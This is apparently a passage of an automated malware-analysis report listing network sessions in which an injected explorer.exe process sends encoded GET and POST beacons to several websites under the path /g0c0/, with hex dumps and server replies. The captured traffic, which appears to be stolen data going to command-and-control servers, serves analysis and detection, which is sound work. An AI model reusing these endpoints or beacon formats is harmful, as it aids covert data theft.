4d 54 41 44 32 4e 52 4d 64 5f 77 62 32 50 63 62 56 59 7e 38 4b 61 47 37 46 4f 57 4a 37 57 38 42 34 69 44 7a 5a 6b 30 67 47 65 65 49 4f 69 7e 58 64 31 77 4e 64 5f 36 44 6f 36 41 36 62 4a 73 59 39 51 41 50 4b 48 37 58 49 54 57 48 41 43 62 65 54 54 6b 6c 31 44 69 6d 48 67 53 47 76 78 64 35 36 74 70 6a 6e 4a 35 70 47 45 70 6a 50 75 78 62 49 6e 50 31 61 69 50 56 47 2d 6f 79 4c 65 61 68 73 4a 6f 70 4a 4d 69 6e 71 4b 6a 74 4d 76 45 41 6d 70 35 52 79 76 6d 62 37 49 36 47 70 46 33 68 70 54 71 46 6a 76 41 45 34 7a 67 38 41 44 45 42 54 6b 57 57 75 74 63 69 6f 4c 66 59 7e 43 51 34 41 56 43 70 63 67 4f 4c 53 43 33 50 66 6d 74 56 6e 4f 4f 69 58 4b 63 4a 55 77 70 55 4c 78 31 6e 47 6b 65 61 4d 4a 54 6b 54 34 74 57 61 73 6f 68 35 4c 38 79 70 67 65 70 76 65 69 51 62 75 55 62 37 6a 4f 71 6b 77 39 52 35 42 51 70 31 79 4d 6e 69 77 77 7a 4c 48 6d 31 4e 6f 6e 6f 79 6e 4b 39 5a 34 34 73 44 30 4f 73 5a 31 7a 43 4a 69 55 4c 77 4a 56 6d 76 73 64 71 71 6e 57 72 5a 62 62 77 58 76 4f 34 63 5f 37 36 42 4c 7e 78 69 77 57 32 75 66 6b 6f 39 59 59 4b 34 55 46 4f 73 58 61 71 33 69 47 52 63 36 4b 73 6a 48 28 63 42 63 6b 56 77 73 75 61 72 74 4b 4e 54 5a 6e 45 4f 58 73 66 78 6e 56 78 61 5f 47 32 61 6a 68 4a 61 6a 64 6c 4c 45 6a 62 6a 34 69 63 6a 5a 58 70 64 57 42 62 43 31 44 6a 37 4e 70 43 64 4d 39 48 76 45 39 68 48 78 6a 6d 34 32 7e 59 57 43 69 6f 74 37 72 59 54 5a 63 55 36 46 70 44 37 4d 45 46 35 72 51 77 6d 50 62 58 64 69 70 57 37 53 73 4e 35 6e 57 68 44 30 7a 4e 63 71 34 70 41 5a 49 6d 7e 36 6b 77 49 37 6c 44 52 52 6b 6b 63 43 56 4f 28 70 53 67 30 45 30 66 44 54 33 44 74 46 6a 31 31 51 4e 72 64 30 41 34 76 46 6b 5f 50 76 54 34 43 33 47 6a 67 6b 4d 6f 4f 65 6e 54 33 76 4b 32 61 4b 6f 77 54 41 70 59 44 79 76 47 4c 72 52 4c 39 47 48 33 4e 48 4d 4e 35 5a 4c 54 68 31 47 6b 37 4c 73 61 75 59 36 65 31 49 7e 78 6c 4e 5a 65 6c 42 50 39 4e 55 71 4f 32 70 4a 79 45 73 31 36 7e 6d 4f 76 6f 5f 42 6f 74 75 61 4a 67 76 61 37 62 5f 49 6c 5a 6d 73 42 35 47 38 70 71 77 4a 39 58 38 65 4e 49 54 7e 55 5a 4a 37 72 70 4c 52 38 79 32 64 75 71 31 47 7a 4d 4e 37 33 43 74 5a 61 51 5f 52 35 65 59 6e 77 53 57 7e 6f 33 43 4f 67 51 71 4a 7a 63 56 6c 51 79 67 35 58 55 57 79 36 47 36 41 64 6f 31 52 79 6b 47 62 6f 44 50 68 38 64 58 70 44 4d 36 71 59 34 78 74 59 4f 51 4a 47 52 54 79 4d 6e 45 56 30 59 65 69 31 4c 5a 59 6c 46 30 72 58 74 6d 54 45 31 34 4f 37 6f 75 76 62 47 76 7a 7a 30 2d 7a 32 58 39 46 61 31 59 64 4a 70 64 75 57 65 38 33 6c 68 54 5a 64 51 48 57 71 42 6d 48 6b 78 65 63 31 46 69 38 59 69 4c 63 67 4e 72 54 67 76 34 52 6b 66 73 54 6e 53 33 41 64 4c 74 44 44 32 56 73 33 45 4a 75 66 59 4c 74 4e 37 4e 37 4d 62 67 4d 59 7a 45 47 42 50 71 50 49 64 2d 30 54 7e 36 6c 61 35 5f 34 68 39 39 69 48 30 44 33 4a 55 78 50 63 57 62 30 6e 75 4f 59 73 58 74 42 62 79 73 31 4f 59 37 71 48 6c 59 4f 36 48 52 28 5f 71 6e 4c 68 6f 44 65 64 53 70 4c 4f 55 45 78 46 39 52 43 72 6e 45 55 68 6b 52 79 6a 66 52 32 64 77 39 61 79 7e 4b 75 78 65 50 78 59 50 4c 35 31 4f 69 41 53 30 51 6d 42 55 62 48 4c 64 39 62 33 53 4a 38 6f 34 39 6f 56 46 62 6f 32 48 62 5a 69 6f 6f 41 64 33 65 79 4f 4e 6f 7a 33 34 43 55 44 6c 44 6c 49 38 30 45 69 66 71 69 70 5a 75 71 34 48 6e 38 72 58 63 59 63 56 45 32 58 66 43 5a 63 6d 49 33 50 69 34 7e 41 58 73 37 49 38 5f 4d 52 6d 51 4f 55 30 33 28 41 34 53 32 4f 64 31 75 4f 5a 34 52 6f 31 47 58 61 6b 53 6d 48 56 43 4a 57 6b 33 54 37 58 36 4b 6f 34 39 49 33 38 62 32 4d 6a 69 63 4e 63 56 28 78 39 39 64 43 70 5a 72 6d 74 37 48 63 64 51 77 4f 72 72 53 51 4a 71 47 64 6a 35 55 51 66 37 79 57 6d 7a 6e 53 6c 32 6d 54 7a 38 66 79 65 79 57 79 68 33 41 4f 42 46 7e 76 58 62 69 6d 32 58 71 56 70 68 28 73 6c 31 75 70 5a 32 50 53 5a 30 65 34 55 4b 77 46 67 43 6b 68 4c 2d 37 37 77 53 65 70 54 35 61 37 51 7a 28 51 58 6e 6f 61 57 42 77 5a 69 78 42 2d 5a 47 6a 72 6a 59 56 72 6a 63 6b 63 36 71 32 46 35 75 4b 61 59 36 31 58 4b 4f 78 43 48 6b 46 4c 39 72 Data Ascii: J1ZahCdL=GtArA0LdA2Mcmxg6Hgpsx64fOXo572w7~2B8iscLJnlZdpZeFqCpI7X55HfIwwBVAmpAVUwqEXRdMTAD2NRMd_wb2PcbVY~8KaG7FOWJ7W8B4iDzZk0gGeeIOi~Xd1wNd_6Do6A6bJsY9QAPKH7XITWHACbeTTkl1DimHgSGvxd56tpjnJ5pGEpjPuxbInP1aiPVG-oyLeahsJopJMinqKjtMvEAmp5Ryvmb7I6GpF3hpTqFjvAE4zg8ADEBTkWWutcioLfY~CQ4AVCpcgOLSC3PfmtVnOOiXKcJUwpULx1nGkeaMJTkT4tWasoh5L8ypgepveiQbuUb7jOqkw9R5BQp1yMniwwzLHm1NonoynK9Z44sD0OsZ1zCJiULwJVmvsdqqnWrZbbwXvO4c_76BL~xiwW2ufko9YYK4UFOsXaq3iGRc6KsjH(cBckVwsuartKNTZnEOXsfxnVxa_G2ajhJajdlLEjbj4icjZXpdWBbC1Dj7NpCdM9HvE9hHxjm42~YWCiot7rYTZcU6FpD7MEF5rQwmPbXdipW7SsN5nWhD0zNcq4pAZIm~6kwI7lDRRkkcCVO(pSg0E0fDT3DtFj11QNrd0A4vFk_PvT4C3GjgkMoOenT3vK2aKowTApYDyvGLrRL9GH3NHMN5ZLTh1Gk7LsauY6e1I~xlNZelBP9NUqO2pJyEs16~mOvo_BotuaJgva7b_IlZmsB5G8pqwJ9X8eNIT~UZJ7rpLR8y2duq1GzMN73CtZaQ_R5eYnwSW~o3COgQqJzcVlQyg5XUWy6G6Ado1RykGboDPh8dXpDM6qY4xtYOQJGRTyMnEV0Yei1LZYlF0rXtmTE14O7ouvbGvzz0-z2X9Fa1YdJpduWe83lhTZdQHWqBmHkxec1Fi8YiLcgNrTgv4RkfsTnS3AdLtDD2Vs3EJufYLtN7N7MbgMYzEGBPqPId-0T~6la5_4h99iH0D3JUxPcWb0nuOYsXtBbys1OY7qHlYO6HR(_qnLhoDedSpLOUExF9RCrnEUhkRyjfR2dw9ay~KuxePxYPL51OiAS0QmBUbHLd9b3SJ8o49oVFbo2HbZiooAd3eyONoz34CUDlDlI80EifqipZuq4Hn8rXcYcVE2XfCZcmI3Pi4~AXs7I8_MRmQOU03(A4S2Od1uOZ4Ro1GXakSmHVCJWk3T7X6Ko49I38b2MjicNcV(x99dCpZrmt7HcdQwOrrSQJqGdj5UQf7yWmznSl2mTz8fyeyWyh3AOBF~vXbim2XqVph(sl1upZ2PSZ0e4UKwFgCkhL-77wSepT5a7Qz(QXnoaWBwZixB-ZGjrjYVrjckc6q2F5uKaY61XKOxCHkFL9rFja2KeFvJhSRNFShAXF_joaafFy-xtUVI00V4dJ-p0qttGxSvZP-dAk61pS94OksVtZHRr~k6buhR0NmsPb5CJoJ4e2C8.
Mar 2, 2023 17:22:03.786488056 CET	1187	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 02 Mar 2023 16:22:03 GMT Content-Type: text/html Content-Length: 138 Connection: close Location: https://www.julesgifts.co.uk/g0c0/ Expires: Thu, 02 Mar 2023 16:42:03 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49760	212.227.172.253	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:22:06.344923973 CET	1188	OUT	GET /g0c0/?J1ZahCdL=LvoLDBvSBwADsyk8OFhB+eEYCloM5F4PvHVBhfoVTxA9RuBvaY3JKeLz6WT2wF14Jhg7cGkNOjhTPTUiw+ZdZP048csFAvWlDrGxEsvZ5gpq&uEk=kKVhb1ODb HTTP/1.1 Host: www.julesgifts.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:22:06.363009930 CET	1189	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 02 Mar 2023 16:22:06 GMT Content-Type: text/html Content-Length: 138 Connection: close Location: https://www.julesgifts.co.uk/g0c0/?J1ZahCdL=LvoLDBvSBwADsyk8OFhB+eEYCloM5F4PvHVBhfoVTxA9RuBvaY3JKeLz6WT2wF14Jhg7cGkNOjhTPTUiw+ZdZP048csFAvWlDrGxEsvZ5gpq&uEk=kKVhb1ODb Expires: Thu, 02 Mar 2023 16:42:06 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49761	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:22:16.908564091 CET	1190	OUT	POST /g0c0/ HTTP/1.1 Host: www.chemkimcorp.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.chemkimcorp.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.chemkimcorp.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 75 62 63 63 71 38 6c 73 47 5f 41 6e 6d 45 64 2d 6c 79 79 62 55 54 6a 72 48 37 68 6b 4e 5a 52 55 67 43 6b 6d 4d 51 39 6b 76 61 34 68 45 71 53 30 5a 6f 7e 76 45 6c 66 42 73 78 41 4b 4a 53 28 76 28 32 77 43 61 39 66 30 56 7a 54 65 75 49 53 59 31 36 39 7a 54 50 35 68 78 4a 33 63 28 49 6b 69 55 58 71 76 34 50 4c 71 4f 4a 64 50 53 54 54 65 4d 56 77 37 65 6e 36 76 46 32 66 5f 43 37 6f 58 46 7a 65 5f 6c 65 75 5f 73 56 62 31 77 35 72 47 63 71 62 45 34 63 30 58 41 59 6f 69 54 66 75 45 56 78 76 6f 56 72 56 43 55 55 6f 69 49 44 4f 75 7a 33 58 53 6d 68 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=ubccq8lsG_AnmEd-lyybUTjrH7hkNZRUgCkmMQ9kva4hEqS0Zo~vElfBsxAKJS(v(2wCa9f0VzTeuISY169zTP5hxJ3c(IkiUXqv4PLqOJdPSTTeMVw7en6vF2f_C7oXFze_leu_sVb1w5rGcqbE4c0XAYoiTfuEVxvoVrVCUUoiIDOuz3XSmhk.
Mar 2, 2023 17:22:16.930386066 CET	1190	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Mar 2023 16:22:16 GMT Content-Type: text/html Content-Length: 146 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs= X-Wix-Request-Id: 1677774136.9137764833816747 X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49730	183.181.84.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:19.158641100 CET	1019	OUT	GET /g0c0/?J1ZahCdL=FDm8rKKDmQD/I16UESZCScQJd5RkugjO7i+IXGcmdNvbCKiIDHrvo4AwKUGq/V+xVbt3++Blt9ecK1dyBRpOcdYFF1CFhWNWgdQRY0tY801v&uEk=kKVhb1ODb HTTP/1.1 Host: www.star-house.okinawa Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:20:19.634284019 CET	1019	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 02 Mar 2023 16:20:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://star-house.okinawa/g0c0/?J1ZahCdL=FDm8rKKDmQD/I16UESZCScQJd5RkugjO7i+IXGcmdNvbCKiIDHrvo4AwKUGq/V+xVbt3++Blt9ecK1dyBRpOcdYFF1CFhWNWgdQRY0tY801v&uEk=kKVhb1ODb

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49731	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:24.912605047 CET	1021	OUT	POST /g0c0/ HTTP/1.1 Host: www.nichevesting.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.nichevesting.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.nichevesting.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 31 42 55 71 53 4c 50 46 79 74 4a 54 33 6c 45 30 58 77 4a 73 50 50 4d 72 67 31 33 48 67 55 57 6a 50 55 54 6f 37 76 42 39 59 37 33 77 47 65 55 58 67 39 57 74 62 4d 28 75 57 49 46 5a 4a 64 64 73 45 66 4d 66 74 54 34 35 32 65 7e 67 55 39 57 69 35 64 77 61 70 61 67 58 54 77 4a 78 33 49 36 6d 73 56 61 43 48 6e 4c 42 64 33 55 6d 6e 39 73 57 35 72 7e 54 36 49 51 41 59 61 32 77 45 36 5a 58 73 71 49 6e 71 39 63 75 6d 66 64 6f 51 7a 4b 4c 68 63 55 6f 66 47 57 33 7a 76 65 54 38 4f 71 66 4c 6d 39 6e 5a 39 54 50 43 64 35 47 6b 4d 50 78 41 78 78 45 6d 52 67 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=1BUqSLPFytJT3lE0XwJsPPMrg13HgUWjPUTo7vB9Y73wGeUXg9WtbM(uWIFZJddsEfMftT452e~gU9Wi5dwapagXTwJx3I6msVaCHnLBd3Umn9sW5r~T6IQAYa2wE6ZXsqInq9cumfdoQzKLhcUofGW3zveT8OqfLm9nZ9TPCd5GkMPxAxxEmRg.
Mar 2, 2023 17:20:25.056494951 CET	1021	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 02 Mar 2023 16:20:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49732	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:27.597650051 CET	1023	OUT	POST /g0c0/ HTTP/1.1 Host: www.nichevesting.com Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.nichevesting.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.nichevesting.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 31 42 55 71 53 4c 50 46 79 74 4a 54 34 6d 63 30 56 58 39 73 48 50 4d 71 38 46 33 48 72 30 57 6e 50 55 66 6f 37 71 78 74 59 4a 37 77 47 49 49 58 6e 66 75 74 41 4d 28 75 43 34 46 64 55 74 63 33 45 66 49 54 74 58 30 50 32 63 53 67 58 62 47 69 28 59 63 46 69 4b 68 78 58 77 4a 2d 33 49 36 4a 73 52 32 47 48 6d 4c 6e 64 33 4d 6d 6e 50 55 57 6f 72 7e 53 31 6f 51 41 59 61 32 43 45 36 59 4f 73 71 51 76 71 35 77 2d 7a 39 46 6f 51 57 32 4c 6a 5f 73 72 64 47 57 7a 37 50 65 47 76 4c 62 41 41 6c 63 41 61 50 28 74 61 4e 35 56 38 4f 48 2d 48 55 64 73 36 68 4e 77 4e 4c 72 30 49 49 6d 38 78 58 53 4a 7e 6d 34 49 36 4a 6b 70 35 35 6b 47 53 2d 6f 57 49 4c 6d 58 62 53 4c 79 42 79 70 39 48 79 68 33 48 33 59 4e 42 4b 71 52 59 52 28 44 4c 72 7a 70 79 6a 6e 39 48 63 6c 7a 52 46 44 4a 45 77 47 34 7e 6a 64 4f 7e 49 6a 4f 33 31 50 48 58 39 45 43 75 48 48 6f 56 55 65 49 38 54 53 47 32 79 4a 35 54 76 75 54 33 61 79 76 61 4d 68 32 4d 59 75 39 71 79 28 69 4b 64 59 61 79 74 73 5f 4a 49 6a 7a 49 4f 59 6e 49 63 6e 6f 66 6a 76 41 4a 6f 6c 59 36 53 6c 34 56 4b 6b 5f 55 68 75 56 4f 42 30 65 51 58 4f 43 4e 79 79 67 4f 50 77 32 57 48 71 56 49 69 50 78 57 68 47 7a 4b 34 63 57 4f 54 61 6f 39 49 63 63 6d 68 52 49 4b 72 28 48 6a 68 52 70 43 6e 58 52 28 65 53 57 57 47 68 4e 6f 6c 43 66 36 50 28 6e 53 57 43 36 32 43 6b 53 4f 62 66 6e 28 4f 61 50 65 4a 39 57 38 50 4f 5f 69 2d 30 7a 6e 65 76 6b 73 74 58 44 6f 4e 6b 38 41 30 6c 6e 28 54 66 61 31 35 39 7a 46 45 44 4f 6c 78 62 2d 75 62 4c 53 50 31 48 57 4f 7a 54 65 32 53 48 63 34 6a 30 35 4f 77 34 76 31 79 64 30 47 62 7e 2d 4a 37 71 70 34 69 57 4d 28 41 6e 5a 7a 5a 4a 68 62 49 58 7a 63 74 61 4b 70 44 6e 7a 32 75 49 6a 6c 42 63 50 64 42 4a 5f 67 43 32 77 72 7a 72 61 72 76 73 31 39 69 62 6d 72 66 35 6c 66 34 58 52 31 64 53 79 37 72 45 75 32 4d 79 38 31 59 68 5a 68 74 63 69 49 36 79 4f 46 74 6f 46 38 77 45 7a 43 70 7a 67 4e 50 6a 47 6f 67 46 6c 44 4f 57 4f 72 4d 61 6d 70 35 30 4e 49 39 4b 69 42 49 7e 68 51 58 44 30 73 77 28 5f 73 6a 33 6d 6e 43 33 57 46 30 43 54 63 50 63 74 72 7a 69 70 36 37 4f 43 38 54 6c 4a 47 31 70 52 6a 58 58 75 7a 4b 7e 42 77 64 54 71 70 33 34 70 63 35 56 53 31 69 71 6f 6d 37 7e 6a 54 31 63 4b 50 43 34 65 37 50 74 54 4a 59 70 37 63 38 32 62 75 34 6d 53 69 35 72 69 6a 39 71 4d 64 76 37 58 30 6e 4b 78 39 30 7e 6b 33 31 55 73 73 6c 70 56 76 73 62 64 36 63 7e 76 5a 4e 36 31 50 34 4d 2d 59 32 63 70 37 41 36 36 50 52 44 59 53 64 39 4c 41 6a 66 49 61 65 6c 51 4d 74 59 57 49 36 59 63 46 37 6a 52 33 63 51 2d 49 4c 69 31 5a 66 37 7a 55 6b 68 45 79 70 52 63 4a 4a 45 63 31 66 39 6d 37 77 76 37 70 45 28 39 6b 44 6e 71 38 30 75 4c 5a 49 64 5a 6f 68 42 78 6b 64 35 70 28 6c 43 77 59 76 41 32 44 30 53 56 41 54 52 75 31 4f 41 41 53 54 43 46 38 70 44 70 5a 6d 6e 72 54 52 35 4b 4e 5a 50 5a 59 68 48 51 46 7a 33 76 38 32 55 6f 4d 57 4c 57 6f 79 79 50 43 34 7a 6d 45 50 66 71 6b 74 38 6b 7a 56 69 63 30 72 6b 6b 57 68 77 31 51 65 35 43 61 67 36 44 6a 43 39 74 61 2d 79 41 36 55 28 73 6d 64 7a 34 76 6a 76 50 65 33 4c 74 55 48 59 74 7e 41 73 6f 6e 36 78 65 4e 59 42 43 58 37 42 68 70 59 47 49 65 39 68 62 57 57 6f 71 38 7a 58 70 59 78 6f 51 33 48 77 70 64 48 63 46 76 42 4e 59 70 30 76 74 36 31 57 37 34 69 78 51 61 73 39 4d 50 45 76 78 32 5f 4c 39 55 7a 79 70 65 73 4d 56 6c 38 50 47 49 58 53 4b 50 63 6e 42 72 71 50 35 67 77 53 33 49 45 43 32 77 59 50 48 4f 46 48 61 5a 75 48 67 5a 45 63 47 46 55 63 63 66 77 41 38 63 4b 37 51 6b 33 76 51 7e 33 5a 73 4d 68 49 66 6a 6f 30 30 43 65 49 56 71 4a 55 51 4c 4b 63 5f 6b 64 35 55 56 30 4e 50 72 36 6e 42 58 77 4e 66 50 4f 48 4d 50 65 62 72 56 41 34 4e 46 65 65 4b 31 33 66 46 31 73 64 62 58 6f 6b 6b 72 73 32 6d 58 54 6e 77 69 36 4c 70 67 75 31 52 46 6f 45 32 39 4f 37 6c 76 4b 28 52 57 4b 52 72 35 6c 4e 34 69 30 75 57 57 56 31 5a 75 39 75 51 4e 56 4b 70 57 6a 36 61 32 39 64 52 4c 35 55 72 68 5a 56 64 66 61 61 49 7e 33 74 45 51 68 63 54 41 78 74 73 76 32 5a 6d 72 57 32 41 44 67 66 48 28 6a 37 4b 72 53 53 43 59 32 66 6f 38 4b 30 35 75 6e 32 37 6d 5f 41 78 75 46 4e 34 69 4b 6a 79 6f 51 45 32 62 74 6d 58 50 39 58 34 4e 39 53 74 28 67 48 72 34 67 4e 41 78 4a 69 78 28 47 Data Ascii: J1ZahCdL=1BUqSLPFytJT4mc0VX9sHPMq8F3Hr0WnPUfo7qxtYJ7wGIIXnfutAM(uC4FdUtc3EfITtX0P2cSgXbGi(YcFiKhxXwJ-3I6JsR2GHmLnd3MmnPUWor~S1oQAYa2CE6YOsqQvq5w-z9FoQW2Lj_srdGWz7PeGvLbAAlcAaP(taN5V8OH-HUds6hNwNLr0IIm8xXSJ~m4I6Jkp55kGS-oWILmXbSLyByp9Hyh3H3YNBKqRYR(DLrzpyjn9HclzRFDJEwG4~jdO~IjO31PHX9ECuHHoVUeI8TSG2yJ5TvuT3ayvaMh2MYu9qy(iKdYayts_JIjzIOYnIcnofjvAJolY6Sl4VKk_UhuVOB0eQXOCNyygOPw2WHqVIiPxWhGzK4cWOTao9IccmhRIKr(HjhRpCnXR(eSWWGhNolCf6P(nSWC62CkSObfn(OaPeJ9W8PO_i-0znevkstXDoNk8A0ln(Tfa159zFEDOlxb-ubLSP1HWOzTe2SHc4j05Ow4v1yd0Gb~-J7qp4iWM(AnZzZJhbIXzctaKpDnz2uIjlBcPdBJ_gC2wrzrarvs19ibmrf5lf4XR1dSy7rEu2My81YhZhtciI6yOFtoF8wEzCpzgNPjGogFlDOWOrMamp50NI9KiBI~hQXD0sw(_sj3mnC3WF0CTcPctrzip67OC8TlJG1pRjXXuzK~BwdTqp34pc5VS1iqom7~jT1cKPC4e7PtTJYp7c82bu4mSi5rij9qMdv7X0nKx90~k31UsslpVvsbd6c~vZN61P4M-Y2cp7A66PRDYSd9LAjfIaelQMtYWI6YcF7jR3cQ-ILi1Zf7zUkhEypRcJJEc1f9m7wv7pE(9kDnq80uLZIdZohBxkd5p(lCwYvA2D0SVATRu1OAASTCF8pDpZmnrTR5KNZPZYhHQFz3v82UoMWLWoyyPC4zmEPfqkt8kzVic0rkkWhw1Qe5Cag6DjC9ta-yA6U(smdz4vjvPe3LtUHYt~Ason6xeNYBCX7BhpYGIe9hbWWoq8zXpYxoQ3HwpdHcFvBNYp0vt61W74ixQas9MPEvx2_L9UzypesMVl8PGIXSKPcnBrqP5gwS3IEC2wYPHOFHaZuHgZEcGFUccfwA8cK7Qk3vQ~3ZsMhIfjo00CeIVqJUQLKc_kd5UV0NPr6nBXwNfPOHMPebrVA4NFeeK13fF1sdbXokkrs2mXTnwi6Lpgu1RFoE29O7lvK(RWKRr5lN4i0uWWV1Zu9uQNVKpWj6a29dRL5UrhZVdfaaI~3tEQhcTAxtsv2ZmrW2ADgfH(j7KrSSCY2fo8K05un27m_AxuFN4iKjyoQE2btmXP9X4N9St(gHr4gNAxJix(GMsGaS2urb4gAw-1JNFZMSK16ViwyMdsYajH1CR834isF6fLcRG7A9B3efJmZBdEqahzgcfzL3cbn4wifH_64TNNpDPVMg.
Mar 2, 2023 17:20:27.742013931 CET	1024	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 02 Mar 2023 16:20:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not 